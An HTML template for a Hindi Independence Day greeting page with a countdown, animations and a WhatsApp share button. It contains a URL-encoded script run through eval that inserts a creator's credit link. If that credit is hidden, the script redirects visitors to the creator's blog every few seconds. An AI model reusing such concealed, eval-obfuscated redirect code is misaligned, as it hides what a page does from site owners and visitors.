<html>
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<!---------------- end--------- -->
	<meta name="google" content="notranslate" />
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
	<meta name="keywords" content=" Independence day wishes "/>
	<meta name="description" content="Share Independence Day with your friends"/>
	<meta name="twitter:title" content="Happy Independence Day"/>
	<meta name="twitter:description" content="Click here"/>
	<meta name="twitter:card" content=" Happy Independence Day"/>
	<meta name="twitter:site" content="Independence day Wishes"/>
	<meta name="twitter:creator" content="Happy Independence Day"/>
	<meta name="twitter:image" content="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png"/>
	<meta property="og:title" content="Happy independence day"/>
	<meta property="og:site_name" content="Happy independence day"/>
	<meta property="og:url" content="Your Site url"/>
	<meta property="og:description" content="Click here"/>
	<meta property="og:type" content="article"/>
	<meta property="og:image" content="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png"/>
	<meta itemprop="name" content="Independence Day Shubhkamnayain">
	<meta itemprop="description" content="Click here"/>
	<!----- Favicon ------>
	<link rel="icon" type="image/png" sizes="32x32" href="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png"/>
	<title>[Your Name] Wish You Happy Independence Day 2020</title>
	
	<!----social icon css link---->
	 <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"/>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js" type="text/javascript"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" type="text/javascript"></script>                    <!---This Script Is Made By First Tech Info---->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" type="text/javascript"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
<link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
<link href='https://fonts.googleapis.com/css?family=Aclonica:&effectfire-animation' rel='stylesheet'>
<link href="https://fonts.googleapis.com/css?family=Courgette&display=swap" rel="stylesheet">
<link rel="stylesheet" href="animation.css">
<style>
.matki{animation:aadisoni linear 5s;animation-iteration-count:infinite;transform-origin:50% 100%;animation-fill-mode:forwards;-webkit-animation:aadisoni linear 5s;-webkit-animation-iteration-count:infinite;-webkit-transform-origin:50% 100%;-webkit-animation-fill-mode:forwards}@keyframes aadisoni{0%{transform:translate(0px,0px) rotate(0deg)}15%{transform:translate(-25px,0px) rotate(-5deg)}30%{transform:translate(20px,0px) rotate(3deg)}45%{transform:translate(-15px,0px) rotate(-3deg)}60%{transform:translate(10px,0px) rotate(2deg)}75%{transform:translate(-5px,0px) rotate(-1deg)}100%{transform:translate(0px,0px) rotate(0deg)}}@-webkit-keyframes aadisoni{0%{-webkit-transform:translate(0px,0px) rotate(0deg)}15%{-webkit-transform:translate(-25px,0px) rotate(-5deg)}30%{-webkit-transform:translate(20px,0px) rotate(3deg)}45%{-webkit-transform:translate(-15px,0px) rotate(-3deg)}60%{-webkit-transform:translate(10px,0px) rotate(2deg)}75%{-webkit-transform:translate(-5px,0px) rotate(-1deg)}100%{-webkit-transform:translate(0px,0px) rotate(0deg)}}div.bounce{animation:bounceIn 4s infinite}


.body
{
	
    text-transform: capitalize;
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover; 
}
i{
	color:black;
}
#demo{
font-size: 30px; color:orange; -webkit-text-stroke-width: 0.75px;
   -webkit-text-stroke-color: black;

    }

figure {
	text-align: center;
      background: url(https://1.bp.blogspot.com/-IJGopGY_-fM/XxrBpn7CNFI/AAAAAAAAB38/3w1lLt4b-Z4k9gKoUnbNp464vommJ71BgCLcBGAsYHQ/s50/firsttechinfoar.blogspot.com.gif);
  transform-origin:center center;
  transform-style:preserve-3d;
}

h1 {
  width:100%;
  line-height:1.5;
  font:900 40px  'Arial', cursive;
  position:absolute;
color: black;  /* Fallback: assume this color ON TOP of image */
background: url(https://1.bp.blogspot.com/-IJGopGY_-fM/XxrBpn7CNFI/AAAAAAAAB38/3w1lLt4b-Z4k9gKoUnbNp464vommJ71BgCLcBGAsYHQ/s50/firsttechinfoar.blogspot.com.gif);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
text-transform: uppercase;
margin-bottom: 5px;
padding: 0 10px;

  color:#fff;
}
.name{
	
	padding-top: 10px;
	padding-bottom: 50px;
   animation: swing 4s infinite;
}



.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}


p.h2 {
   font-size: 38px;
    text-align: center;
    
    
    animation: rock infinite 1s;
    font-family:  'SF Espresso Shack', cursive;
    letter-spacing: 2px;
}
p.h3 {
	font-size: 45px;
    text-align: center;
    color:violet;
    font-family:  'SF Espresso Shack', cursive;
    letter-spacing: 2px;
	 
}
.t2{
	text-align: center;
}
.sharecartoon{
	border-radius: 160px;
}
.open-button {
  background-color: green;
  color: white;
  padding: 10px 20px;
  border: none;
  border-radius: 10px;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  bottom: 2px;
  width: 100%;
  right:0px;
  left: 0px;

}

/* The popup form - hidden by default */
.form-popup {
  display: none;
  position: fixed;
  height: 100%;
  padding-top: 10px;
  padding-left: 10px;
  padding-right: 10px;
  bottom: 2px;
background: rgba(76, 175, 80, 0.8);
  width: 100%;
  right:0px;
  left: 0px;
  border: none;
  z-index: 9;
}
/* Add styles to the form container */
.form-container {
	
  max-width: 100%;
  padding: 10px;
  background-color: white;
  opacity: 1;
}
/* Full-width input fields */
.form-container input[type=text] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #f1f1f1;
}
/* When the inputs get focus, do something */
.form-container input[type=text]:focus {
  background-color: #ddd;
  opacity:0.8;
  outline: none;
}

/* Set a style for the submit/login button */
.form-container .btn {
  background-color: #4CAF50;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}
/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: red;
}

/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}
.link-share{
	min-width: 500px;
}
@media screen and (max-width: 800px) {
	.link-share{
	min-width: 200px;
	}
.hname{
	animation:glow 10s ease-in-out infinite;
}
.m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.mm1, .mm2{
		width: 65;
		height: auto;
	}
@media screen and (max-width: 800px) {
.mm1, .mm2{
		width: 40px;
		height: 40px;
	}
}
@media screen and (min-width: 800px) {
}
.enter-name {
	background-color: green;
	  color: white;
  padding: 10px 20px;
  border: none;
  border-radius: 10px;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  bottom: 2px;
  width: 100%;
  right:0px;
  left: 0px;
}
.enter-name .input-name {
	padding: 10px 20px;
	 border: none;
  border-radius: 10px;
 position: fixed;
  bottom: 2px;
  right:200px;
  left: 0px;
  width: 40%;
}
.enter-name .button-name {
  width: 40%;
}
.button-name:hover {
  opacity: 1;
}
 .formBox {
	padding: 0;
position:fixed;
bottom:2;
right:10%;
left:10%;
animation: rock infinite 0.5s;
display: inline-block;
 }
  .goButton {
 border-radius:0px 25px 25px 0px;
 width: 20%;
 background: orange;
 display: inline-block;
 vertical-align: bottom;
 border: 2px solid orange;
 float: right;
 color: white;
  cursor: pointer;
 font-size:16px;
 padding:8px 0;
 height: 48px;
 text-align:center;
 font-weight: 700;
 }
  .nameTextBox {
	  border-radius: 25px 0px 0px 25px;
 border: 2px solid orange;
 text-align: center;
 display: inline-block;
 width: 80%;color: black;
 font-size:16px;margin: 0;
 background: #fff;
 height: 48px;
 font-weight: 700;
 padding:8px 0;
 }
 .share-footer{
  animation: rubberBand infinite 2s;
  padding: 0;
  position:fixed;
  bottom:2;
  right:10%;
  left:10%;
 }
 @keyframes floatup{
 0% {margin-top: 50%;}
 100% {margin-top: -50%;}
 }
 @keyframes sideways{
 0% {margin-left: 0em;}
 100%{margin-left: 20em;}
 //100% {margin-left: 0px;}
 }
.wishMessage {
  color: #fff;
  font-size: 22px;
  font-weight: bold;
  margin-top: 20px;
  text-shadow: 0px 0px 10px #afafaf;
  text-align: center;
}

 </style>
</head>

<body class='bodynotworking' style='background-image: url();  background-repeat: repeat-y repeat-x;' >
<style>
/* Paste this css to your style sheet file or under head tag */
/* This only works with JavaScript, 
if it's not present, don't show loader */
.no-js #loader { display: none;  }
.js #loader { display: none; position: absolute; left: 100px; top: 0; }
.se-pre-con {
	position: fixed;
	left: 0px;
	top: 0px;
	bottom:0;
	width: 100%;
	height: 100%;
	z-index: 99;
	background: url(https://1.bp.blogspot.com/-4gLwa-iW0yI/Xy_ftqNQ0OI/AAAAAAAACHg/mGZu-bJ9swEENZBFtaCQkTNitT64SZEDQCLcBGAsYHQ/s1241/inbk.png) center no-repeat fixed ;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
	background-color: rgba(0, 0, 0, 0.6);;
}
.se-pre-con-right {
	position: fixed;
	right: 0px;
	top: 0px;
	bottom:0;
	width: 100%;
	height: 100%;
	z-index: 99;
	background: url(https://1.bp.blogspot.com/-4gLwa-iW0yI/Xy_ftqNQ0OI/AAAAAAAACHg/mGZu-bJ9swEENZBFtaCQkTNitT64SZEDQCLcBGAsYHQ/s1241/inbk.png) center no-repeat fixed ;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  
	background-color: rgba(0, 0, 0, 0.6);;
}
.se-pre-con-image{
position: fixed;
padding:10px;
//background-color: rgba(122, 22, 22, 0.6);
	top: 1%; 
	right: 8%;
	z-index: 100;
}</style>

<div class="se-pre-con-right" ></div>
<div class="se-pre-con" ></div>
<div id="openscript" class="se-pre-con-image text-center" >
<div style="font-size: 25px;text-shadow: 1px 1px 3px white, 1px 1px 3px white, -1px -1px 3px white, -1px -1px 3px white;color: red;font-weight: bold;"><br>👇👇 <br>इस तितली🦋को टच करो!</div>
<img src="https://1.bp.blogspot.com/-kHb3uzs2S9Y/Xy_fwuKewwI/AAAAAAAACHk/n64OHz1wcTsjjvotdaVc15PvRhECWupPgCLcBGAsYHQ/s212/inbt.gif" style="animation: tada 4s infinite;max-width:100px; width: 90%;" /></div> <!----script made by Ashish Ranjan visit ashishranjan.me for More amazing script ----->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js" type="text/javascript"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.js" type="text/javascript"></script>
<script type="text/javascript">
eval(decodeURIComponent('%24%28%64%6f%63%75%6d%65%6e%74%29%2e%72%65%61%64%79%28%66%75%6e%63%74%69%6f%6e%28%29%7b%20%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%32%33%25%36%66%25%37%30%25%36%35%25%36%65%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%37%27%29%29%29%2e%6f%6e%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%33%25%36%63%25%36%39%25%36%33%25%36%62%25%32%37%27%29%29%2c%20%66%75%6e%63%74%69%6f%6e%28%29%7b%20%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%32%25%32%65%25%37%33%25%36%35%25%32%64%25%37%30%25%37%32%25%36%35%25%32%64%25%36%33%25%36%66%25%36%65%25%32%64%25%37%32%25%36%39%25%36%37%25%36%38%25%37%34%25%32%32%27%29%29%29%2e%61%6e%69%6d%61%74%65%28%7b%20%77%69%64%74%68%3a%20%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%32%25%33%35%25%32%32%27%29%29%20%7d%2c%20%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%37%33%25%36%63%25%36%66%25%37%37%25%32%37%27%29%29%29%3b%20%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%32%25%32%65%25%37%33%25%36%35%25%32%64%25%37%30%25%37%32%25%36%35%25%32%64%25%36%33%25%36%66%25%36%65%25%32%32%27%29%29%29%2e%61%6e%69%6d%61%74%65%28%7b%20%77%69%64%74%68%3a%20%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%32%25%33%35%25%32%32%27%29%29%20%7d%2c%20%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%37%33%25%36%63%25%36%66%25%37%37%25%32%37%27%29%29%29%3b%20%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%32%25%32%65%25%37%33%25%36%35%25%32%64%25%37%30%25%37%32%25%36%35%25%32%64%25%36%33%25%36%66%25%36%65%25%32%64%25%36%39%25%36%64%25%36%31%25%36%37%25%36%35%25%32%32%27%29%29%29%2e%66%61%64%65%4f%75%74%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%32%25%37%33%25%36%63%25%36%66%25%37%37%25%32%32%27%29%29%29%3b%20%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%32%25%32%33%25%36%64%25%37%39%25%34%31%25%37%35%25%36%34%25%36%39%25%36%66%25%32%32%27%29%29%29%5b%30%5d%2e%70%6c%61%79%28%29%3b%20%7d%29%3b%20%7d%29%3b%20%24%28%77%69%6e%64%6f%77%29%2e%6c%6f%61%64%28%66%75%6e%63%74%69%6f%6e%28%29%20%7b%20%7d%29%3b%20%24%28%64%6f%63%75%6d%65%6e%74%29%5b%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%37%32%25%36%35%25%36%31%25%36%34%25%37%39%25%32%37%27%29%29%5d%28%66%75%6e%63%74%69%6f%6e%28%29%7b%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%32%33%25%36%36%25%36%39%25%37%32%25%37%33%25%37%34%25%37%34%25%36%35%25%36%33%25%36%38%25%36%39%25%36%65%25%36%36%25%36%66%25%32%37%27%29%29%29%5b%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%33%25%37%33%25%37%33%25%32%37%27%29%29%5d%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%34%25%36%39%25%37%33%25%37%30%25%36%63%25%36%31%25%37%39%25%32%37%27%29%29%2c%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%39%25%36%65%25%36%63%25%36%39%25%36%65%25%36%35%25%32%64%25%36%32%25%36%63%25%36%66%25%36%33%25%36%62%25%32%37%27%29%29%29%3b%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%32%33%25%36%36%25%36%39%25%37%32%25%37%33%25%37%34%25%37%34%25%36%35%25%36%33%25%36%38%25%36%39%25%36%65%25%36%36%25%36%66%25%32%37%27%29%29%29%5b%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%38%25%37%34%25%36%64%25%36%63%25%32%37%27%29%29%5d%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%34%64%25%36%31%25%36%34%25%36%35%25%32%30%25%34%32%25%37%39%25%32%30%25%33%63%25%36%31%25%32%30%25%36%38%25%37%32%25%36%35%25%36%36%25%33%64%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%37%32%25%37%33%25%37%34%25%37%34%25%36%35%25%36%33%25%36%38%25%36%39%25%36%65%25%36%36%25%36%66%25%36%31%25%37%32%25%32%65%25%36%32%25%36%63%25%36%66%25%36%37%25%37%33%25%37%30%25%36%66%25%37%34%25%32%65%25%36%33%25%36%66%25%36%64%25%32%32%25%33%65%25%34%36%25%36%39%25%37%32%25%37%33%25%37%34%25%32%30%25%35%34%25%36%35%25%36%33%25%36%38%25%32%30%25%34%39%25%36%65%25%36%36%25%36%66%25%33%63%25%32%66%25%36%31%25%33%65%25%32%37%27%29%29%29%3b%73%65%74%49%6e%74%65%72%76%61%6c%28%66%75%6e%63%74%69%6f%6e%28%29%7b%69%66%28%21%24%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%32%33%25%36%36%25%36%39%25%37%32%25%37%33%25%37%34%25%37%34%25%36%35%25%36%33%25%36%38%25%36%39%25%36%65%25%36%36%25%36%66%25%33%61%25%37%36%25%36%39%25%37%33%25%36%39%25%36%32%25%36%63%25%36%35%25%32%37%27%29%29%29%5b%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%37%27%29%29%5d%29%7b%77%69%6e%64%6f%77%5b%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%63%25%36%66%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%37%27%29%29%5d%5b%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%38%25%37%32%25%36%35%25%36%36%25%32%37%27%29%29%5d%3d%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%37%32%25%37%33%25%37%34%25%37%34%25%36%35%25%36%33%25%36%38%25%36%39%25%36%65%25%36%36%25%36%66%25%36%31%25%37%32%25%32%65%25%36%32%25%36%63%25%36%66%25%36%37%25%37%33%25%37%30%25%36%66%25%37%34%25%32%65%25%36%33%25%36%66%25%36%64%25%32%37%27%29%29%7d%7d%2c%33%30%30%30%29%7d%29%3b%20'));
</script>
	
	 <div class="container">
		<!----Countdown time Setting ---->

<script> 
// Set the date we're counting down to
var countDownDate = new Date("August 15, 2020 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

// Display the result in the element with id="demo"
document.getElementById("demo").innerHTML = days + "<font color='green'> दिन,</font> " + hours + "<font color='green'> घंटे,</font> "
+ minutes + "<font color='green'>  मिनट,<br></font> " + seconds + "<font color='green'> सेकेंड </font>पहले   ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "";
  }
}, 1000);
</script>

		<div class='name' id="psname" >
			<figure >
			<h1 id="name1" style="text-transform: uppercase; ">First Tech Info</h1>
			<h1 id="name2" style="text-transform: uppercase;">First Tech Info</h1>
			<h1 id="name3" style="text-transform: uppercase;">First Tech Info</h1>
			<h1 id="name4" style="text-transform: uppercase;">First Tech Info</h1>
			<h1 id="name5" style="text-transform: uppercase;">First Tech Info</h1>
			<h1 id="name6" style="text-transform: uppercase;">First Tech Info</h1>
			</figure>
		</div>
				<div class='name' hidden id="sname"></div>
		<center>
			<img src='https://1.bp.blogspot.com/-g2ef0U4pY8s/Xy_fMH4L96I/AAAAAAAACGw/SFU-SDfS3fgnbhyYjscnAJeXVcu5EdHeQCLcBGAsYHQ/w600/hpn.png' width="80%" height="15%"style="animation: rubberBand 2s infinite"/>
				<b>	<p id='demo' style="animation: pulse 0.5s infinite"> </p> 	</b>
			<img src="https://1.bp.blogspot.com/-0t5DbbwGjfc/Xy_h6D7kN2I/AAAAAAAACJA/YyvD01dhqjgfgtge1dBj89F6zaqYTXYQQCLcBGAsYHQ/s1000/imn.png" width="90%" height="35%"style="animation: tada 4.5s infinite"><br>
<img src="https://1.bp.blogspot.com/-ZkTKC6mvHbI/Xy_fSrtSFiI/AAAAAAAACG0/AJ9U76cNUjkKDt5K_XSTwiyYiNqQ9RfTwCLcBGAsYHQ/s780/in15.png" width="80%" height="25%"style="animation: pulse 1s infinite">
			</center>

<center><div class="w3-content w3-section" style="max-width:500px">
<img class="mySlides" src="https://1.bp.blogspot.com/-ofcZNDQEt9o/Xy_fzz8iR5I/AAAAAAAACHo/YW9j0_DIjVc7IS7CHxAZSPkByxhXk3qqwCLcBGAsYHQ/s240/ins1.gif" style="width:90%; height:250px;">
<img class="mySlides" src="https://1.bp.blogspot.com/-w1d7Lvau0IY/Xy_f456yvWI/AAAAAAAACH0/M_tBNpo9JsUvWvFP_JOA1xfgT9935kB2QCLcBGAsYHQ/s240/ins2.gif" style="width:90%; height:250px;">
<img class="mySlides" src="https://1.bp.blogspot.com/-RN_tk0iKV_o/Xy_f9yMVkRI/AAAAAAAACH8/JXArcH1QF9E8vhYjiHtz1Pmv8e3y7gzaACLcBGAsYHQ/s240/ins3.gif" style="width:95%; height:250px;">
<img class="mySlides" src="https://1.bp.blogspot.com/-Nvg7Xh1plxI/Xy_gXpnuhwI/AAAAAAAACIY/2fqnnWGGiboK_GZy6dBWFPspivuG0vj7wCLcBGAsYHQ/s240/ins5.gif" style="width:85%; height:250px;">
</div><center>
<div style="font-size: 30px;animation: pulse 1s infinite;">
<p style="color: Orange"><b>तिरंगा लहरायेंगें, </b> </p>
<p style="color:blue"><b>भक्ति <font color="blue">गीत गुन</font>गूनायेंगें,</b></p>
<p style="color:blue"><b>वादा <font color="blue">करो इस</font> देश को,<br>
<p style="color:green"><b>दुनिया का सबसे प्यारा देश बनायेंगें।</b><br></div>
<span style="text-shadow:1px 1px 1px black;color:black;font-size: 30px; " ><font color='orange'>HAPPY </font><font color=white>INDEP<font color=blue>EN</font>DENCE</font><font color=green> DAY!</font></span>
<img src="https://1.bp.blogspot.com/-fMU-2dbwYaI/Xy_gaRH2quI/AAAAAAAACIc/k0D2LsYqOwUeycHth-jbrof1v6WBbS1JQCLcBGAsYHQ/s240/insl.gif" width="87%" height="45%"><br>
<center><div id='firsttechinfo' /></center>
</div> 


			
<br/>
<br/>
<br/>


			
			<div id="formBox" class="formBox" style="left:6%;right:6%">
			<input type="text" name="name" class="nameTextBox"id="nameTextBox" placeholder="👉 write your name here">
			<div class="goButton" id="goButton" onclick="if (!window.__cfRLUnblockHandlers) return false; createGreeting()" data-cf-modified-3c06e57a7ac22d0bc0d6a22b-="">
	    	👉देखे
			</div>
			</div>
			
			<div id="share-button" hidden class='share-footer' text align="center">
			<div class="container enter-name">
							<button class="container open-button" onclick="if (!window.__cfRLUnblockHandlers) return false; shareActionWA()" style="font-size:20px" data-cf-modified-3c06e57a7ac22d0bc0d6a22b-=""><i class="fa fa-whatsapp" style="font-size:25px;color:white"></i> <b style="font-size:16px;" >यहाँ से whatsapp पर शेयर करे </b><i class="fa fa-whatsapp" style="font-size:25px;color:white"></i></button>
			</div>
			</div >
		</div>
		<!--  Marque -->
				<marquee class="m1" behavior="scroll" direction="up" scrolldelay="5"><br>
		<img src="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-_xcdttNPEQ0/Xy_fpeG3sVI/AAAAAAAACHc/2-bXOAfs7nMGKN36rqtbDi0A2Jr0zhw7QCLcBGAsYHQ/s278/inb3.gif" class="mm1"/><br>
        <img src="https://1.bp.blogspot.com/-u0IWIk9MlUA/Xy_fUuNJDgI/AAAAAAAACG4/hFuK8LnWy-EMP3TG3sGWPAmwUXiea63awCLcBGAsYHQ/s178/in2.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-_xcdttNPEQ0/Xy_fpeG3sVI/AAAAAAAACHc/2-bXOAfs7nMGKN36rqtbDi0A2Jr0zhw7QCLcBGAsYHQ/s278/inb3.gif" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-u0IWIk9MlUA/Xy_fUuNJDgI/AAAAAAAACG4/hFuK8LnWy-EMP3TG3sGWPAmwUXiea63awCLcBGAsYHQ/s178/in2.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-_xcdttNPEQ0/Xy_fpeG3sVI/AAAAAAAACHc/2-bXOAfs7nMGKN36rqtbDi0A2Jr0zhw7QCLcBGAsYHQ/s278/inb3.gif" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-u0IWIk9MlUA/Xy_fUuNJDgI/AAAAAAAACG4/hFuK8LnWy-EMP3TG3sGWPAmwUXiea63awCLcBGAsYHQ/s178/in2.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-_xcdttNPEQ0/Xy_fpeG3sVI/AAAAAAAACHc/2-bXOAfs7nMGKN36rqtbDi0A2Jr0zhw7QCLcBGAsYHQ/s278/inb3.gif" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-u0IWIk9MlUA/Xy_fUuNJDgI/AAAAAAAACG4/hFuK8LnWy-EMP3TG3sGWPAmwUXiea63awCLcBGAsYHQ/s178/in2.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-_xcdttNPEQ0/Xy_fpeG3sVI/AAAAAAAACHc/2-bXOAfs7nMGKN36rqtbDi0A2Jr0zhw7QCLcBGAsYHQ/s278/inb3.gif" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-u0IWIk9MlUA/Xy_fUuNJDgI/AAAAAAAACG4/hFuK8LnWy-EMP3TG3sGWPAmwUXiea63awCLcBGAsYHQ/s178/in2.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-LsxJ6Ws0rMk/Xy_fXFwm0jI/AAAAAAAACG8/p2Zzj1xON2ISDRYTMvCbT5WwYPk8M97lQCLcBGAsYHQ/s512/inb.png" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-_xcdttNPEQ0/Xy_fpeG3sVI/AAAAAAAACHc/2-bXOAfs7nMGKN36rqtbDi0A2Jr0zhw7QCLcBGAsYHQ/s278/inb3.gif" class="mm1"/><br>
		<img src="https://1.bp.blogspot.com/-u0IWIk9MlUA/Xy_fUuNJDgI/AAAAAAAACG4/hFuK8LnWy-EMP3TG3sGWPAmwUXiea63awCLcBGAsYHQ/s178/in2.png" class="mm1"/><br>
